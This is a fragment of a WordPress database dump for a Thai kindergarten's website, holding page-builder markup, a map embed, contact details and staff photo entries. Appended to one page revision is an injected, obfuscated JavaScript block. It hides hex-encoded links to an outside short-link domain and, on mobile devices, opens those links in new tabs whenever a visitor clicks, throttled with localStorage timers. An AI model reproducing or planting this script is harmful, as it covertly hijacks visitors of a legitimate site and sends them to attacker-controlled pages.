loads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-10-26 16:28:35','2025-10-26 09:28:35','',19,'http://watprato.ssk.in.th/?p=740',0,'revision','',0),
(741,1,'2025-10-26 16:29:09','2025-10-26 09:29:09','','ผอ.','','inherit','open','closed','','%e0%b8%9c%e0%b8%ad','','','2025-10-26 16:29:09','2025-10-26 09:29:09','',19,'http://watprato.ssk.in.th/wp-content/uploads/2025/10/ผอ.jpg',0,'attachment','image/jpeg',0),
(743,1,'2025-10-26 16:31:06','2025-10-26 09:31:06','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:gallery {\"columns\":3,\"linkTo\":\"none\",\"align\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-3 is-cropped\"><!-- wp:image {\"id\":736,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/10/ผอ.วิชุดา-724x1024.jpg\" alt=\"\" class=\"wp-image-736\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\">            <strong>     นางวิชุดา ชัยชาญ </strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>ผู้อำนวยการโรงเรียน</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 